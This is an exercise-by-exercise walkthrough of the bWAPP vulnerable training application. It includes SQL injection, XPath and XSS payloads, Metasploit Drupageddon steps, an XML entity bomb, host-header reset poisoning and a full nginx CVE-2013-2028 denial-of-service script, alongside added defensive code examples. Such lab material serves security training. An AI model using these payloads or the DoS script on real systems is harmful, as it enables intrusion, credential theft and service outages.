bWAPP
/ A1 - Injection /
- HTML Injection - Reflected (GET)
- HTML Injection - Reflected (POST)
- HTML Injection - Reflected (Current URL)
- HTML Injection - Stored (Blog)
- iFrame Injection
- LDAP Injection (Search) [not covered yet]
- Mail Header Injection (SMTP) [not covered yet]
- OS Command Injection
- OS Command Injection - Blind
- PHP Code Injection
- SQL Injection (GET/Select)
- SQL Injection (POST/Search)
- SQL Injection (POST/Select)
- SQL Injection (AJAX/JSON/jQuery)
- SQL Injection (CAPTCHA)
- SQL Injection (Login Form/Hero)
- SQL Injection (Login Form/User)
- SQL Injection (SQLite)
- SQL Injection (Drupal)
- SQL Injection - Stored (Blog)
- SQL Injection - Stored (SQLite)
- SQL Injection - Stored (User-Agent)
- SQL Injection - Stored (XML)
- SQL Injection - Blind - Boolean-Based
- SQL Injection - Blind - Time-Based
- SQL Injection - Blind (SQLite)
- SQL Injection - Blind (Web Services/SOAP)
- XML/XPath Injection (Login Form)
- XML/XPath Injection (Search)
/ A2 - Broken Auth. & Session Mgmt. /
- Broken Authentication - CAPTCHA Bypassing
- Broken Authentication - Forgotten Function
- Broken Authentication - Insecure Login Forms
- Broken Authentication - Logout Management
- Broken Authentication - Password Attacks
- Broken Authentication - Weak Passwords
- Session Management - Administrative Portals
- Session Management - Cookies (HTTPOnly)
- Session Management - Cookies (Secure)
- Session Management - Session ID in URL
- Session Management - Strong Sessions
/ A3 - Cross-Site Scripting (XSS) /
- Cross-Site Scripting - Reflected (GET)
- Cross-Site Scripting - Reflected (POST)
- Cross-Site Scripting - Reflected (JSON)
- Cross-Site Scripting - Reflected (AJAX/JSON)
- Cross-Site Scripting - Reflected (AJAX/XML)
- Cross-Site Scripting - Reflected (Back Button)
- Cross-Site Scripting - Reflected (Custom Header)
- Cross-Site Scripting - Reflected (Eval)
- Cross-Site Scripting - Reflected (HREF)
- Cross-Site Scripting - Reflected (Login Form)
- Cross-Site Scripting - Reflected (phpMyAdmin)
- Cross-Site Scripting - Reflected (PHP_SELF)
- Cross-Site Scripting - Reflected (Referer)
- Cross-Site Scripting - Reflected (User-Agent)
- Cross-Site Scripting - Stored (Blog)
- Cross-Site Scripting - Stored (Change Secret)
- Cross-Site Scripting - Stored (Cookies)
- Cross-Site Scripting - Stored (SQLiteManager)
- Cross-Site Scripting - Stored (User-Agent)
/ A4 - Insecure Direct Object References / (insecure direct object references)
- Insecure DOR (Change Secret)
- Insecure DOR (Reset Secret)
- Insecure DOR (Order Tickets)
/ A5 - Security Misconfiguration / (security misconfiguration)
- Arbitrary File Access (Samba)
- Cross-Domain Policy File (Flash)
- Cross-Origin Resource Sharing (AJAX)
- Cross-Site Tracing (XST) (cross-site tracing attack)
- Denial-of-Service (Large Chunk Size)
- Denial-of-Service (Slow HTTP DoS)
- Denial-of-Service (SSL-Exhaustion)
- Denial-of-Service (XML Bomb)
- Insecure FTP Configuration
- Insecure SNMP Configuration
- Insecure WebDAV Configuration
- Local Privilege Escalation (sendpage)
- Local Privilege Escalation (udev)
- Man-in-the-Middle Attack (HTTP)
- Man-in-the-Middle Attack (SMTP)
- Old/Backup & Unreferenced Files
- Robots File
/ A6 - Sensitive Data Exposure /
- Base64 Encoding (Secret)
- BEAST/CRIME/BREACH Attacks
- Clear Text HTTP (Credentials)
- Heartbleed Vulnerability
- Host Header Attack (Reset Poisoning)
- POODLE Vulnerability
- SSL 2.0 Deprecated Protocol
- HTML5 Web Storage (Secret)
- Text Files (Accounts)
/ A7 - Missing Functional Level Access Control /
- Directory Traversal - Directories
- Directory Traversal - Files
- Host Header Attack (Cache Poisoning)
- Host Header Attack (Reset Poisoning)
- Local File Inclusion (SQLiteManager)
- Remote & Local File Inclusion (RFI/LFI)
- Restrict Device Access
- Restrict Folder Access
- Server Side Request Forgery (SSRF)
- XML External Entity Attacks (XXE)
/ A8 - Cross-Site Request Forgery (CSRF) /
- Cross-Site Request Forgery (Change Password)
- Cross-Site Request Forgery (Change Secret)
- Cross-Site Request Forgery (Transfer Amount)
/ A9 - Using Known Vulnerable Components /
- Buffer Overflow (Local)
- Buffer Overflow (Remote)
- Drupal SQL Injection (Drupageddon)
- Heartbleed Vulnerability
- PHP CGI Remote Code Execution
- PHP Eval Function
- phpMyAdmin BBCode Tag XSS
- Shellshock Vulnerability (CGI)
- SQLiteManager Local File Inclusion
- SQLiteManager PHP Code Injection
- SQLiteManager XSS
/ A10 - Unvalidated Redirects & Forwards /
- Unvalidated Redirects & Forwards (1)
- Unvalidated Redirects & Forwards (2)
/ Other bugs... /
- ClickJacking (Movie Tickets)
- Client-Side Validation (Password)
- HTTP Parameter Pollution
- HTTP Response Splitting
- HTTP Verb Tampering
- Information Disclosure - Favicon
- Information Disclosure - Headers
- Information Disclosure - PHP version
- Information Disclosure - Robots File
- Insecure iFrame (Login Form)
- Unrestricted File Upload
--------------------------- Extras --------------------------
- A.I.M. - No-authentication Mode
- Client Access Policy File
- Cross-Domain Policy File
- Evil 666 Fuzzing Page
- Manual Intervention Required!
- Unprotected Admin Portal
- We Steal Secrets... (html)
- We Steal Secrets... (plain)
- WSDL File (Web Services/SOAP)
---------------------- bWAPP v2.2 -----------------------
/ A1 - Injection /
HTML Injection - Reflected (GET)
HTML Injection - Reflected (POST)
Same as the GET version, just sent as a POST.
Nothing is filtered: whatever HTML you type is inserted into the page.
HTML Injection - Reflected (Current URL)
This one only works in Internet Explorer; in Chrome and Firefox the HTML in the URL parameter is not rendered.
Simply append a value to the end of the URL.
HTML Injection - Stored (Blog)
iFrame Injection
An iframe is a technique for embedding other resources (documents, videos and so on) in an HTML page. The simplest description is "a frame that displays the content of another page inside the current page".
Injecting an iframe tag into the page abuses a plain HTML tag: the frame acts as a viewer that can load files, videos, etc. either over a protocol (a URL) or from the server's local filesystem.
Here we notice that the page embeds robots.txt, so let's try other files.
LDAP Injection (Search) [not covered yet]
Mail Header Injection (SMTP) [not covered yet]
OS Command Injection
For the other bypasses, see the earlier notes.
That is all it takes.
OS Command Injection - Blind
For the blind variant we can use a time delay or a plain command chain,
for example `||whoami`
or `sleep 5`.
PHP Code Injection
Direct command execution works.
Server-Side Includes (SSI) Injection [not covered yet]
SQL Injection (GET/Search)
Entering ' produces an error, so we test the column count with ORDER BY:
ORDER BY 8 errors out (so there are 7 columns).
Work out which columns are echoed back.
Then query the database; the rest is the same as a normal UNION-based injection.
SQL Injection (GET/Select)
A numeric parameter, so inject directly; same as above.
SQL Injection (POST/Search)
We try I'
and get an error,
so we need to close the string:
I%' #
This closes the quote and the query returns results.
Of course, since errors are displayed, error-based injection would also work.
SQL Injection (POST/Select)
Same as above, but the input is a select list; capture the POST request and modify it the same way.
SQL Injection (AJAX/JSON/jQuery)
AJAX is asynchronous communication: it can refresh parts of a page without reloading the page itself.
Its responses are usually JSON or XML, and jQuery provides helpers for making AJAX calls.
The JSON is fetched from sqli_10-2,
so 10-2 is where the injection is.
Because it is asynchronous we can simply type into the front-end search box; 7 columns works, 8 returns nothing.
-a%' union select 1,database(),(group_concat(table_name)),4,5,6,7 from information_schema.tables where table_schema='bWAPP' #
SQL Injection (CAPTCHA)
(Could not get this one working; not sure whether the problem is on my side.)
SQL Injection (Login Form/Hero)
With 4 columns the injection still works;
with 5 it fails,
so there are exactly four columns.
Find the echoed column.
Since errors are shown here, we go straight to error-based injection.
SQL Injection (Login Form/User)
There is an error message, but no place where a result is echoed.
We cannot tell whether an injection worked, because the front end only shows a result when the password (checked in a second if statement) is also correct.
So ORDER BY cannot be used to find the column count (the reason for locating the injection point is to use ORDER BY to get the column count).
The column count can instead be found directly with a UNION query,
but the same problem applies: the front end only shows a result when the password (the second if statement) is also correct.
Let's look at the database.
We see that the third column is an MD5 hash.
Because the user name and password are checked separately, to get the error message echoed back the injected UNION column in position 3 must equal the hash of the password we submit.
For example, the injected query is:
Username: ' union select 1,2,"77de68daecd823babbb58edb1c8e14d7106e83bb",4,5,6,7,8,9 #
Password: 3
SQL Injection (SQLite)
First install SQLite support:
apt-get install sqlite3
apt-get install php5-sqlite
Then restart Apache:
service apache2 restart
Injecting a single quote only produces "Error: HY000", which is probably SQLite's error code.
From the way the search behaves it is clearly a fuzzy match,
so the SQL statement is roughly:
select * from books where title='%$title%';
Confirm the injection point:
Iron%' and 1=1 --
Note that in SQLite the comment marker is --
Find the column count:
Iron%' order by 6 --
Find which columns are displayed:
123%' union select 1,2,3,4,5,6 --
Dump all tables:
123%' union select 1,sqlite_version(),name,4,5,6 from sqlite_master --
Columns of the users table:
123%' union select 1,sqlite_version(),sql,4,5,6 from sqlite_master --
The sql column holds the CREATE TABLE statement, which gives the column definitions.
Read the values:
123%' union select 1,2,login,password,5,6 from users --
Because of environment problems on my side, this part is reproduced from
https://blog.csdn.net/angry_program/article/details/104545171#0x07%E3%80%81SQL%20Injection%20%28Login%20Form%2FUser%29
About SQLite
SQLite has a built-in table, sqlite_master, with five columns: type, name, tbl_name, rootpage and sql.
type records the kind of object: table, index, view or trigger.
tbl_name records the table the object belongs to, e.g. the table an index is defined on; for a table it is the table name itself.
name records the object's name, e.g. the table or index name.
rootpage records the number of the database page where the object is stored; for views and triggers it is 0 or NULL.
sql holds the CREATE statement of every object, i.e. the table structure.
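The SQL injection exercises above all rely on the search term being spliced into the SQL text. The following Python example (added here; it is not bWAPP code and not from the original post) reproduces that pattern against an in-memory SQLite database with constructed rows, then shows the parameterized form of the same query. The table names, column names and sample rows are assumptions for the demonstration, not bWAPP's schema. Run with the page's `Iron%' and 1=1 --` payload, the string-built query returns every "Iron" title and a `UNION` payload reaches the users table; the bound-parameter version treats the whole term as a LIKE pattern and returns nothing.

```python
import sqlite3

# Constructed sample rows standing in for bWAPP's books and users tables
# (assumption: table/column names and values are illustrative only).
BOOKS = [("Iron Man", "Marvel"), ("Iron Giant", "Warner"), ("Batman", "DC")]
USERS = [("bee", "bug")]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE books(id INTEGER PRIMARY KEY, title TEXT, publisher TEXT);"
        "CREATE TABLE users(id INTEGER PRIMARY KEY, login TEXT, password TEXT);"
    )
    con.executemany("INSERT INTO books(title, publisher) VALUES (?, ?)", BOOKS)
    con.executemany("INSERT INTO users(login, password) VALUES (?, ?)", USERS)
    return con


def search_vulnerable(con, title):
    """String-built query, as the write-up infers bWAPP does it: the search
    term becomes part of the SQL text, so a quote inside it ends the string
    literal and everything after it is parsed as SQL."""
    sql = "SELECT title, publisher FROM books WHERE title LIKE '%" + title + "%'"
    return con.execute(sql).fetchall()


def search_parameterized(con, title):
    """Bound parameter: the term is shipped as a value and is never parsed as
    SQL. The LIKE wildcards are added to the value, not to the statement."""
    sql = "SELECT title, publisher FROM books WHERE title LIKE ?"
    return con.execute(sql, ("%" + title + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for term in ("Iron", "Iron%' and 1=1 --", "Iron%' and 1=2 --"):
        print(repr(term), search_vulnerable(db, term), search_parameterized(db, term))
```

The fix is not escaping but separating code from data: with `?` placeholders SQLite receives the statement and the value through different channels, so no quoting trick in the value can change the statement's shape.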
SQL Injection (Drupal)
Only usable on bee-box, so this is a walkthrough of the steps without a result.
search drupal
Use the module for CVE-2014-3704:
use exploit/multi/http/drupal_drupageddon
Set the Drupal site path:
set targeturi /drupal/
Set the target IP and port:
set RHOSTS 192.168.10.10
set rport 8080
Launch and get a shell:
exploit
Background
CVE-2014-3704:
The expandArguments() function does not build prepared statements correctly, which lets a remote attacker perform SQL injection through crafted input. It affects Drupal 7.x before 7.32.
Drupal is an open-source content management system (CMS) with more than a million users (governments, e-commerce, enterprises, financial institutions and so on); unless the Drupalgeddon patch has been installed, every one of them is seriously exposed to this vulnerability.
SQL Injection - Stored (Blog)
First look at the error,
then close the quote.
insert into blog(date,entry,owner) values(now(), '$entry', 'bee');
The injection point is entry; close the preceding values() and append the injected content.
SQL Injection - Stored (SQLite)
(Not usable on my setup, but it is like the previous exercise with SQLite syntax.)
SQL Injection - Stored (User-Agent)
Injecting in the User-Agent header produces an error,
so we close the quote;
we need to close the inner function call, and the echo appears in the ip column.
INSERT INTO blog (date, user_agent, ip_address) VALUES(now(), '$user-agent','$ip');
SQL Injection - Stored (XML)
Clicking the button sends a request.
We notice that the text on the page gets rewritten.
With an echo available, the next step is to work out the SQL statement; since it writes the bee user's value, the guess is an UPDATE:
UPDATE users SET secret = '$secret' WHERE login = '$login';
Since errors are shown here, we try error-based injection.
SQL Injection - Blind - Boolean-Based
After commenting out the rest of the query the response changes, so injection is possible.
Testing a length of 3 returns "does not exist";
"bwapp" is exactly 5 characters, and with 5 it returns "exists".
SQL Injection - Blind - Time-Based
sleep(5) works here, so time-based injection is possible.
With the wrong length the response is clearly not delayed;
with length 5 the response is correct (delayed).
SQL Injection - Blind (SQLite)
SQL Injection - Blind (Web Services/SOAP)
XML/XPath Injection (Login Form)
Adding a single quote produces an xmli error, so there is XPath injection here.
Looking at the source, the login reads heroes.xml and uses an XPath query to look up the user's account and password.
heroes.xml is an XML file that holds the user names, login passwords and other data.
Given the query, the input
123' or 1=1 or ''='
turns the XPath expression into
/heroes/hero[login='123' or 1=1 or ''='' and password='<whatever was typed>']
which is always true: a "universal password" login.
Principle
XPath injection works much like SQL injection: the attacker builds special input, usually fragments of XPath syntax, which the web application passes as a parameter into an XPath query, so that executing the query performs whatever the intruder wants.
The difference is that the target is not a database users table but an XML file holding the data. The attacker can learn the structure of the XML data or read data that would normally not be accessible, and if the XML data is used for authentication, escalate privileges. Because XPath has no access control, none of the access restrictions often met in SQL injection apply.
XML has no access control or user authentication: if a user can run XPath queries and nothing filters the query, the user can reach the entire XML document. Injection points are wherever input enters: cookies, headers, request parameters, and so on.
XML/XPath Injection (Search)
A single quote produces an error, so this is XPath injection.
Looking at the source:
//hero[contains(genre, '$genre')]/movie
This roughly selects the movie elements under every hero whose genre contains $genre.
The genre parameter is attacker-controlled, so a crafted XPath expression can retrieve the whole XML document:
for example, close the quote before $genre, select the hero's password element, then use the | (union) operator to absorb the trailing /movie:
horror')]/password | xx[contains(a,'
The resulting XPath expression is:
//hero[contains(genre, 'horror')]/password | xx[contains(a,'')]/movie
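Both XPath exercises above work because user text is pasted into the query string. The Python example below (added here; not bWAPP code) shows the two defences that apply: `xpath_literal()` turns any string into a single XPath 1.0 string literal (using `concat()` when the value contains both quote styles), so the page's `123' or 1=1 or ''='` payload stays inside the literal; and `login_by_iteration()` avoids building a query at all by walking the parsed document and comparing values in code. The `heroes.xml` content is a constructed sample with made-up accounts, and the helper names are this example's own.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for bWAPP's heroes.xml (assumption: same shape, made-up data).
# Note: a real store should keep password hashes, not plaintext as this file does.
HEROES_XML = """<heroes>
  <hero><login>hero1</login><password>pass1</password><secret>alpha</secret></hero>
  <hero><login>hero2</login><password>pass2</password><secret>beta</secret></hero>
</heroes>"""


def xpath_literal(value):
    """Return `value` as one XPath 1.0 string literal, whatever it contains."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # Both quote kinds present: split on ' and stitch the pieces with concat().
    parts = value.split("'")
    pieces = []
    for i, part in enumerate(parts):
        if part:
            pieces.append("'" + part + "'")
        if i < len(parts) - 1:
            pieces.append("\"'\"")
    return "concat(" + ", ".join(pieces) + ")"


def build_login_query(login, password):
    """The page's query shape, with both inputs forced into literals.
    For an engine with full XPath 1.0 support (e.g. PHP SimpleXML or lxml)."""
    return "/heroes/hero[login=" + xpath_literal(login) + " and password=" + xpath_literal(password) + "]"


def login_by_iteration(xml_text, login, password):
    """No query composition at all: compare element text in code.
    Returns the matching hero's secret, or None."""
    root = ET.fromstring(xml_text)
    for hero in root.findall("hero"):
        if hero.findtext("login") == login and hero.findtext("password") == password:
            return hero.findtext("secret")
    return None


if __name__ == "__main__":
    payload = "123' or 1=1 or ''='"
    print(build_login_query(payload, "x"))
    print(login_by_iteration(HEROES_XML, payload, "x"))  # None: no bypass
```

`xml.etree.ElementTree` only implements a small XPath subset, which is why the iteration approach is shown with it; the literal builder is for code that does hand the query to a real XPath engine.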
/ A2 - Broken Auth. & Session Mgmt. /
Broken Authentication - CAPTCHA Bypassing
CAPTCHA bypass: brute-force with Burp.
The CAPTCHA only has to be filled in once.
Broken Authentication - Forgotten Function
Likewise, brute-force with Burp.
Broken Authentication - Insecure Login Forms
This is plainly an information disclosure.
Broken Authentication - Logout Management
```php
switch($_COOKIE["security_level"])
{
    case "0" :
        // Do nothing
        break;
    case "1" :
        // Destroys the session
        session_destroy();
        break;
    case "2" :
        // Unsets all of the session variables
        $_SESSION = array();
        // Destroys the session
        session_destroy();
        break;
    default :
        // Do nothing
        break;
}
```
There are three levels:
low: after logging out the session is still usable;
medium: the session is destroyed on logout;
high: the session variables are cleared and the session is destroyed.
Broken Authentication - Password Attacks
Again, Burp brute-force.
Broken Authentication - Weak Passwords
Weak-password brute-force.
Session Management - Administrative Portals
An admin portal where the admin check is a 0/1 flag.
Session Management - Cookies (HTTPOnly)
Again three levels:
low: HttpOnly is not set, so the cookie can be read from JavaScript;
medium: HttpOnly is set, so JavaScript cannot read it;
high: the cookie is additionally refreshed over time, and the value the server holds differs too.
Session Management - Cookies (Secure)
Session Management - Session ID in URL
The session ID is placed in the URL.
Session Management - Strong Sessions
Sessions need to be encrypted:
low: no encryption;
medium: HTTPS required.
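The session-management exercises above come down to a few cookie attributes and to keeping the identifier out of the URL. The Python below (added here, not from the post or bWAPP) is a small checker of the kind used in a test suite or log review: it parses a `Set-Cookie` value and reports a missing `HttpOnly`, `Secure` or `SameSite`, flags session identifiers carried in a query string, and shows a cookie built the right way with a random identifier. The parameter-name list and the `bwapp.example` URLs are constructed for the example.

```python
import secrets
from urllib.parse import parse_qs, urlsplit

# Query-string names commonly used for session identifiers (constructed list;
# PHPSESSID is the one bWAPP uses).
SESSION_PARAM_NAMES = {"phpsessid", "sessionid", "jsessionid", "sid", "session"}


def new_session_id():
    """256 bits from the OS CSPRNG; the id carries no user data and is unguessable."""
    return secrets.token_urlsafe(32)


def build_session_cookie(name, value):
    """Set-Cookie value with the attributes the high level of the exercise needs."""
    return f"{name}={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


def audit_set_cookie(header_value):
    """Return (cookie name, findings) for one Set-Cookie header value."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")          # readable by document.cookie
    if "secure" not in attrs:
        findings.append("missing Secure")            # sent over plain HTTP
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict")   # attached to cross-site requests
    return name, findings


def session_ids_in_url(url):
    """Names of session-id parameters found in the URL's query string."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [k for k in params if k.lower() in SESSION_PARAM_NAMES]


if __name__ == "__main__":
    print(audit_set_cookie("PHPSESSID=abc123; Path=/"))
    print(audit_set_cookie(build_session_cookie("PHPSESSID", new_session_id())))
    print(session_ids_in_url("http://bwapp.example/portal.php?PHPSESSID=abc&page=1"))
```

A URL-borne session id ends up in browser history, proxy logs and Referer headers, which is why the third check exists regardless of how the cookie is flagged.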
/ A3 - Cross-Site Scripting (XSS) /
Cross-Site Scripting - Reflected (GET)
low: no filtering, any payload pops an alert;
medium: filtered with addslashes();
high: filtered with htmlspecialchars().
Cross-Site Scripting - Reflected (POST)
Same as GET.
Cross-Site Scripting - Reflected (JSON)
The JSON is loaded inside the page, so we just close the string;
medium and high add htmlspecialchars().
Cross-Site Scripting - Reflected (AJAX/JSON)
AJAX, asynchronous communication;
we just use a different tag:
<img src = x onerror =alert(1)>
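Why does the medium level (`addslashes()`) fall to the `<img onerror>` payload while the high level (`htmlspecialchars()`) holds? The Python example below (added here; it is not bWAPP's code) reimplements PHP's `addslashes()` semantics, puts it next to HTML entity escaping, and adds the encoding needed for the JSON-inside-a-page case from the reflected (JSON) exercise. The function names are this example's own.

```python
import html
import json

# The page's AJAX/JSON payload, used here only as test input.
IMG_PAYLOAD = "<img src=x onerror=alert(1)>"


def addslashes(s):
    """PHP addslashes(): backslash before ' " \\ and NUL. It was designed for
    quoting inside strings and leaves < > = untouched, so tag-based payloads
    survive it unchanged."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def escape_for_html(s):
    """Equivalent of htmlspecialchars($s, ENT_QUOTES): < > & " ' become entities,
    so the browser renders the text instead of parsing a tag."""
    return html.escape(s, quote=True)


def json_for_inline_script(obj):
    """JSON that is safe to embed inside a <script> block: the characters that
    could close the script element or start a tag are written as \\uXXXX escapes,
    which JSON parsers still read back as the original text."""
    return (json.dumps(obj)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


if __name__ == "__main__":
    print(addslashes(IMG_PAYLOAD))        # tag intact: medium level is bypassed
    print(escape_for_html(IMG_PAYLOAD))   # &lt;img ...&gt;: rendered as text
    print(json_for_inline_script({"q": "</script><script>alert(1)</script>"}))
```

The lesson is context-specific output encoding: `addslashes()` is the wrong encoder for HTML, HTML entities are the right one for element content, and JSON placed inside a script needs its own escaping on top of `json_encode`.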
Cross-Site Scripting - Reflected (AJAX/XML)
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)
Cross-Site Scripting - Reflected (HREF)
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)
/ A4 - Insecure Direct Object References / (insecure direct object references)
Insecure DOR (Change Secret)
There is a hidden input field; we can change another user's password directly.
Insecure DOR (Reset Secret)
Another user's password can be reset; same as above, just edit the field.
Insecure DOR (Order Tickets)
The values can be edited directly.
/ A5 - Security Misconfiguration / (security misconfiguration)
Arbitrary File Access (Samba)
The connection from my machine had problems, but choose the tmp share, since tmp is usually writable.
Cross-Domain Policy File (Flash)
This exercise is about Flash's cross-domain access policy.
The relevant file is crossdomain.xml; if its access policy is misconfigured, any remote Flash file can read files from the server.
The figure showed that Flash from any domain is allowed.
Find xdx.as in the evil folder and fill in the corresponding server address.
Recompile a new xdx.swf with Adobe Flash CS3 or later, adding the xdx.as file.
Put the compiled xdx.swf and xdx.php in a folder on another server.
Log in to bWAPP first, then request xdx.php on the other server; it returns the contents of secret.
An Adobe Flash environment is required.
Reproduced from: https://www.jianshu.com/p/495d2ea4cef1
Cross-Origin Resource Sharing (AJAX)
This exercise is about cross-origin resource requests with AJAX.
Reference:
https://www.cnblogs.com/demingblog/p/8393511.html
Here we use the evil attack script shipped with bWAPP.
Cross-Site Tracing (XST) (cross-site tracing attack)
Denial-of-Service (Large Chunk Size)
```python
# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Minor customizations by Malik Mesellem (@MME_IT)
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & Windows XP (nginx v1.4.0)
# CVE : CVE-2013-2028
import httplib
import time
import socket
import sys
import os

# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
packet = 0

def chunk(data, chunk_size):
    chunked = ""
    chunked += "%s\r\n" % (chunk_size)
    chunked += "%s\r\n" % (data)
    chunked += "0\r\n\r\n"
    return chunked

if sys.platform == 'linux-i386' or sys.platform == 'linux2':
    os.system("clear")
elif sys.platform == 'win32':
    os.system("cls")
else:
    os.system("cls")

print "======================================================================"
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028) [http://www.mertsarica.com]"
print "======================================================================"

if len(sys.argv) < 2:
    print "Usage: python nginx_dos.py [target ip:port]\n"
    print "Example: python nginx_dos.py 127.0.0.1:8080\n"
    sys.exit(1)
else:
    host = sys.argv[1].lower()

while packet <= 66:
    body = "beezzzzzzzzzz"
    chunk_size = hex(dos_packet + 1)[3:]
    chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper()
    if debug:
        print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)]
    try:
        con = httplib.HTTPConnection(host)
        url = "/bWAPP/portal.php"
        con.putrequest('POST', url)
        con.putheader('User-Agent', 'bWAPP')
        con.putheader('Accept', '*/*')
        con.putheader('Transfer-Encoding', 'chunked')
        con.putheader('Content-Type', 'application/x-www-form-urlencoded')
        con.endheaders()
        con.send(chunk(body, chunk_size[:len(chunk_size)]))
    except:
        print "Connection error!"
        sys.exit(1)
    try:
        resp = con.getresponse()
        print(resp.status, resp.reason)
    except:
        print "[*] Knock knock, is anybody there ? (" + str(packet) + "/66)"
    packet = packet + 1
    con.close()

print "[+] Done!"
```
This is the (Python 2) proof-of-concept script shipped with bWAPP.
Run it against the target;
the server's response time becomes very long.
Denial-of-Service (Slow HTTP DoS)
0d0a is \r\n.
The page just keeps loading.
Denial-of-Service (SSL-Exhaustion)
Denial-of-Service (XML Bomb)
XML is in effect a simple local database.
Capturing the request, the body is an XML document.
The part at the top is the DTD;
ENTITY defines an entity,
here one named lol whose content is "lol".
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
lol1 contains ten lol;
lol2 contains ten lol1, and each lol1 contains ten lol:
exponential growth.
The last few exercises are DoS; attacking my own VM is inconvenient, so the screenshots were taken from elsewhere.
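The defence against the entity expansion just described is to refuse documents that declare entities at all, before any expansion happens. The Python example below (added here; not bWAPP code) does that with the standard-library expat parser: an `EntityDeclHandler` that raises on the first `<!ENTITY ...>` declaration, plus a handler that rejects external entity references (the XXE case). The three-level bomb and the benign document are constructed inputs; the function and exception names are this example's own.

```python
import xml.parsers.expat


class DtdEntityError(ValueError):
    """Raised when the document declares or references a DTD entity."""


def parse_without_entities(xml_text):
    """Parse `xml_text` with expat and return the element names and text seen.
    Any entity declaration (internal or external) aborts parsing immediately,
    so an exponential expansion such as lol -> lol1 -> lol2 never starts."""
    parser = xml.parsers.expat.ParserCreate()
    seen = {"elements": [], "text": []}

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise DtdEntityError(f"entity declaration {name!r} rejected")

    def on_external_entity(context, base, system_id, public_id):
        raise DtdEntityError("external entity reference rejected")

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: seen["elements"].append(name)
    parser.CharacterDataHandler = lambda data: seen["text"].append(data)
    parser.Parse(xml_text, True)
    return seen


def accepts(xml_text):
    """True if the document parses under the no-entities policy, False if rejected."""
    try:
        parse_without_entities(xml_text)
    except DtdEntityError:
        return False
    return True


# Constructed inputs for the demonstration.
BENIGN = "<r><a>1</a></r>"
BOMB = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE lolz [\n"
    '<!ENTITY lol "lol">\n'
    '<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n'
    '<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">\n'
    "]>\n"
    "<lolz>&lol2;</lolz>"
)
EXTERNAL = '<!DOCTYPE r [<!ENTITY ext SYSTEM "file:///placeholder/path">]><r>&ext;</r>'

if __name__ == "__main__":
    print(accepts(BENIGN), accepts(BOMB), accepts(EXTERNAL))
```

Recent expat releases also cap the amplification ratio of entity expansion, but that is a backstop; an application that never needs DTD entities is better off rejecting them outright, which is what this parser does and what libraries such as defusedxml do under the hood.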
Insecure FTP Configuration
No environment available.
Insecure SNMP Configuration
No environment available.
Insecure WebDAV Configuration
No environment available.
Local Privilege Escalation (sendpage)
No environment available.
Local Privilege Escalation (udev)
No environment available.
Man-in-the-Middle Attack (HTTP)
Still being set up.
Man-in-the-Middle Attack (SMTP)
Old/Backup & Unreferenced Files
A directory of old or backup files.
Robots File
Sensitive paths exposed through robots.txt.
/ A6 - Sensitive Data Exposure /
Base64 Encoding (Secret)
The hint is that the cookie contains a base64-encoded value.
BEAST/CRIME/BREACH Attacks
Needs the bee-box environment.
Clear Text HTTP (Credentials)
Plainly: credentials sent in clear text.
Heartbleed Vulnerability
Everyone has heard of this one, the famous Heartbleed.
Affected version:
OpenSSL 1.0.1
And of course msf can exploit it.
Host Header Attack (Reset Poisoning)
POODLE Vulnerability
SSL 2.0 Deprecated Protocol
HTML5 Web Storage (Secret)
Opening the page directly, we can see the password.
The medium-level password.
Text Files (Accounts)
The account name and password are written into a text file.
/ A7 - Missing Functional Level Access Control /
Directory Traversal - Directories
The files can be accessed directly.
Directory Traversal - Files
Directory traversal.
Host Header Attack (Cache Poisoning)
Cache poisoning.
Host Header Attack (Reset Poisoning)
Since this setup cannot send e-mail, here is a reproduced description of the attack.
When we request a password reset,
we see that the reset link uses localhost as its host.
If we modify the Host header,
substituting our own IP,
the link in the e-mail now points to our IP.
